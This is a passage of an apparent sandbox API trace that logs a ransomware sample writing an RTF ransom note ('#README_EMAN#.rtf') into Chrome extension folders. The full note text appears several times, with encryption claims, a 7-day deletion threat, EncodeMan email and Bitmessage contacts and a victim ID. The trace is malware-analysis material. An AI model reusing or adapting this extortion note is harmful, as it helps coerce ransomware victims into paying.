middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n7äHcénøvÙ|åÀËåVÖ\x05\x04u\x10ªïu3 ", lpUsedDefaultChar=0x0) returned 8717 [0289.253] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.253] CloseHandle (hObject=0x2d4) returned 1 [0289.253] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0289.253] GetLastError () returned 0x2 [0289.253] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 